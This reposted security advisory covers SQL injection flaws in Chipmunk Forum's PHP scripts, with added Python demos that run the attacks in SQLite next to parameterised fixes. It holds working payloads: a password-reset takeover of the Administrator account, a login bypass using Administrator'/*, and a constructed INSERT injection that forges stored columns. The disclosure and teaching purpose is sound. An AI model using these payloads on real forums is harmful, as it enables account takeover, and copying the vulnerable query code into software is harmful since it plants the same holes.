
[Repost] Multiple SQL Injection Vulnerabilities in Chipmunk Forum


Source: www.securiteam.com

Summary
Chipmunk Forum is "a small yet flexible and fully featured forum system".

Due to inadequate input filtering in Chipmunk Forum's PHP scripts, a remote attacker can inject arbitrary SQL into the application's existing queries, allowing him to gain elevated privileges on the forum, change user information, obtain passwords, etc.

Credit:
The information has been provided by GHC vision.

Details
Vulnerable script getpassword.php
Vulnerable code:
if(isset($_POST['submit']))
{
$email=$_POST['email'];
// $email is placed in the query unescaped, so a single quote in it changes the WHERE clause
$getinfo="SELECT * from b_users where email='$email'";
...
// the script resets the password of whichever account the query returned and mails it out
mail("$email","Your Forum password","Your forum password has been set to $value");

Exploit:
Use the following as the email address: ghc@ghc.ru' or username='Administrator . The query then becomes SELECT * from b_users where email='ghc@ghc.ru' or username='Administrator', so the script selects the Administrator row and resets that account's password ("Administrator" must be a valid user name).

Vulnerable script authenticate.php
Vulnerable code:
$username=$_POST['user'];
$password=$_POST['password'];
$password=md5($password);
// $username goes into the query unescaped; only $password is transformed (by md5)
$query = "select * from b_users where username='$username' and password='$password' and validated='1'";

Exploit:
At the login.php page enter Administrator'/* as the username and any password. The /* opens a comment that swallows the rest of the query, including the password and validated checks, so the Administrator row is returned and the attacker is authenticated as Administrator without knowing the password.
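As an added illustration (not code from the advisory or from Chipmunk Forum), the following Python script rebuilds the getpassword.php and authenticate.php queries against an in-memory SQLite table and runs the advisory's two payloads through them, next to parameterised versions of the same queries. The table contents, user names and passwords are constructed for the example; the md5 step mirrors authenticate.php.

```python
import hashlib
import sqlite3

# Constructed stand-in for Chipmunk Forum's b_users table. Column names follow
# the advisory; the users and passwords are invented for this example.
SAMPLE_USERS = [
    # (username, email, plaintext password, validated)
    ("Administrator", "admin@example.com", "password", "1"),
    ("alice", "alice@example.com", "letmein", "1"),
]


def make_db():
    """Build an in-memory SQLite copy of b_users with md5 password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE b_users (userID INTEGER PRIMARY KEY, username TEXT, "
        "email TEXT, password TEXT, validated TEXT)"
    )
    for username, email, plaintext, validated in SAMPLE_USERS:
        conn.execute(
            "INSERT INTO b_users (username, email, password, validated) VALUES (?, ?, ?, ?)",
            (username, email, hashlib.md5(plaintext.encode()).hexdigest(), validated),
        )
    return conn


def getpassword_vulnerable(conn, email):
    """getpassword.php as written: $email is pasted straight into the SQL string."""
    sql = "SELECT username FROM b_users WHERE email='%s'" % email
    return [row[0] for row in conn.execute(sql)]


def getpassword_fixed(conn, email):
    """Same lookup with a bound parameter: quotes inside email are data, not SQL."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM b_users WHERE email=?", (email,))]


def authenticate_vulnerable(conn, username, password):
    """authenticate.php as written: md5() the password, interpolate both values."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM b_users WHERE username='%s' AND password='%s' "
           "AND validated='1'" % (username, pw_hash))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def authenticate_fixed(conn, username, password):
    """Bound parameters: the '/*' payload is just compared against the username column."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM b_users WHERE username=? AND password=? AND validated='1'",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # The advisory's payload turns "WHERE email='...'" into
    # "WHERE email='ghc@ghc.ru' or username='Administrator'".
    print(getpassword_vulnerable(db, "ghc@ghc.ru' or username='Administrator"))  # ['Administrator']
    print(getpassword_fixed(db, "ghc@ghc.ru' or username='Administrator"))       # []
    # "Administrator'/*" comments out the password and validated checks.
    print(authenticate_vulnerable(db, "Administrator'/*", "not the password"))   # Administrator
    print(authenticate_fixed(db, "Administrator'/*", "not the password"))        # None
```

The edit.php ($ID) and search.php ($searchterm) queries below are built the same way and take the same fix: bind the value instead of interpolating it.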

Vulnerable script edit.php
Vulnerable code:
if(isset($_POST['ID']))
{
$ID=$_POST['ID'];
}
else
{
$ID=$_GET['ID'];
}
$checking="SELECT * from b_posts,b_users where b_users.userID=b_posts.author and b_posts.ID='$ID'";

It is possible to inject SQL statements through the $ID variable, which is taken from either POST or GET without any validation.

Vulnerable script search.php
Vulnerable code:
$searchterm=$_POST['searchterm'];
$getthreads="SELECT * from b_posts where post like '%$searchterm%' and threadparent='0' order by telapsed DESC limit $start, 50";

It is possible to inject SQL statements through $searchterm parameter.

Vulnerable script newtopic.php
Vulnerable code:
$name=$_POST['name'];
$title=$_POST['title'];
$post=$_POST['post'];
$day=date("D M d, Y H:i:s");
$timegone=date("U") ;
if($_POST['nosmiley'])
...
$name=strip_tags($name);
$title=strip_tags($title);
$post=strip_tags($post);
$posting="INSERT INTO b_posts (author, title, post,timepost, telapsed, postforum,lastpost,nosmilies,ipaddress) values ('$name', '$title', '$post', '$day', '$timegone','$forumID','$user','$nosmiley','$s')";
mysql_query($posting) or die("could not post");

It is possible to inject SQL statements through the $name, $title and $post parameters: strip_tags() only removes HTML tags and leaves single quotes in place.

Vulnerable script reguser.php
Vulnerable code:
$username=$_POST['username'];
$password=$_POST['password'];
$signature=$_POST['signature'];
$pass2=$_POST['pass2'];
$usercheck="SELECT * from b_users where username='$username' or email='$email'";

...

if ($password==$pass2 && $_POST['password'])
{
$password=md5($password);
$supervalue=$value;
$day=date("U");
$email=$_POST['email'];
$location=$_POST['location'];
$aim=$_POST['aim'];
$showprofile=$_POST['showprofile'];
$icq=$_POST['icq'];
$seedval=$day#0000;
srand($seedval);
$key=RAND(1000000,2000000);
if($requirekey=="no"||$requirekey=="No") //if you do not require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, email, location, AIM, ICQ, showprofile, validated) values ('$username', '$password', '$signature', '$email', '$location', '$aim', '$icq', '$showprofile', '1')";
mysql_query($SQL) or die(mysql_error());
}
else //you require an activation key
{
$SQL ="INSERT into b_users (username, password, sig, keynode, email, location, AIM, ICQ, showprofile) values ('$username', '$password', '$signature', '$key', '$email', '$location', '$aim', '$icq', '$showprofile')";
mysql_query($SQL) or die(mysql_error());
mail("$email","Your forum activation key","Paste the URL to activate your account.
$boardpath/activate.php?username=$username&password=$password&keynode=$key");
}

It is possible to inject SQL statements through the registration form's variables ($username, $password, $signature, $email, $location, $aim, $icq and $showprofile), none of which are escaped before being placed in the INSERT statements.
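The INSERT statements in newtopic.php and reguser.php are injectable in the same way even though they return no rows: an attacker who can close the quoted value can supply the rest of the VALUES list himself and comment out what the script appends, so the columns the script meant to set (the posting forum, the recorded IP address, the key or validated fields) become attacker-controlled. The following script (added here; not code from the advisory or from Chipmunk Forum) models the newtopic.php INSERT in SQLite with a constructed payload in the post body, next to a parameterised version; the timestamps, user names and IP addresses are invented, and strip_tags() is approximated with a regex.

```python
import re
import sqlite3

# Column order from the INSERT in newtopic.php (taken from the advisory).
POST_COLUMNS = ("author, title, post, timepost, telapsed, postforum, "
                "lastpost, nosmilies, ipaddress")


def make_db():
    """In-memory stand-in for b_posts; only the columns the INSERT touches."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE b_posts (ID INTEGER PRIMARY KEY, author TEXT, title TEXT, "
        "post TEXT, timepost TEXT, telapsed TEXT, postforum TEXT, lastpost TEXT, "
        "nosmilies TEXT, ipaddress TEXT)"
    )
    return conn


def strip_tags(s):
    """Rough equivalent of PHP strip_tags(): drops <...> markup, keeps quotes."""
    return re.sub(r"<[^>]*>", "", s)


def _stored_row(conn):
    """Return the most recently inserted post as a dict (for inspection/tests)."""
    cols = ("author", "title", "post", "postforum", "lastpost", "ipaddress")
    row = conn.execute(
        "SELECT %s FROM b_posts ORDER BY ID DESC LIMIT 1" % ", ".join(cols)).fetchone()
    return dict(zip(cols, row))


def new_topic_vulnerable(conn, name, title, post, forum_id, user, client_ip):
    """newtopic.php as written: strip_tags() then string interpolation into INSERT.
    day/timegone/nosmiley are fixed here so the example is reproducible."""
    name, title, post = strip_tags(name), strip_tags(title), strip_tags(post)
    day, timegone, nosmiley = "Mon Jan 01, 2007 00:00:00", "1167609600", "0"
    sql = ("INSERT INTO b_posts (%s) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')"
           % (POST_COLUMNS, name, title, post, day, timegone, forum_id, user, nosmiley, client_ip))
    conn.execute(sql)
    return _stored_row(conn)


def new_topic_fixed(conn, name, title, post, forum_id, user, client_ip):
    """Same INSERT with bound parameters; the payload is stored verbatim as post text."""
    name, title, post = strip_tags(name), strip_tags(title), strip_tags(post)
    day, timegone, nosmiley = "Mon Jan 01, 2007 00:00:00", "1167609600", "0"
    conn.execute(
        "INSERT INTO b_posts (%s) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)" % POST_COLUMNS,
        (name, title, post, day, timegone, forum_id, user, nosmiley, client_ip),
    )
    return _stored_row(conn)


# Constructed payload for the post body: it closes the post value, supplies the
# remaining six columns itself (forum 1, lastpost 'Administrator', IP 127.0.0.1)
# and comments out the real values the script appends. SQLite and MySQL both
# treat "-- " (with the trailing space) as a comment running to end of line.
PAYLOAD = "Hello', 'Mon Jan 01, 2007 00:00:00', '0', '1', 'Administrator', '0', '127.0.0.1') -- "

if __name__ == "__main__":
    db = make_db()
    forged = new_topic_vulnerable(db, "mallory", "hi", PAYLOAD, "3", "mallory", "203.0.113.9")
    print(forged["postforum"], forged["lastpost"], forged["ipaddress"])  # 1 Administrator 127.0.0.1
    clean = new_topic_fixed(db, "mallory", "hi", PAYLOAD, "3", "mallory", "203.0.113.9")
    print(clean["postforum"], clean["lastpost"], clean["ipaddress"])     # 3 mallory 203.0.113.9
```

The vulnerable path stores the post in forum 1 with a spoofed IP address even though the script passed forum 3 and the real client address; with bound parameters the entire payload simply becomes the post text. The reguser.php INSERTs take exactly the same shape, with the attacker's values arriving through the registration fields instead of the post body.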
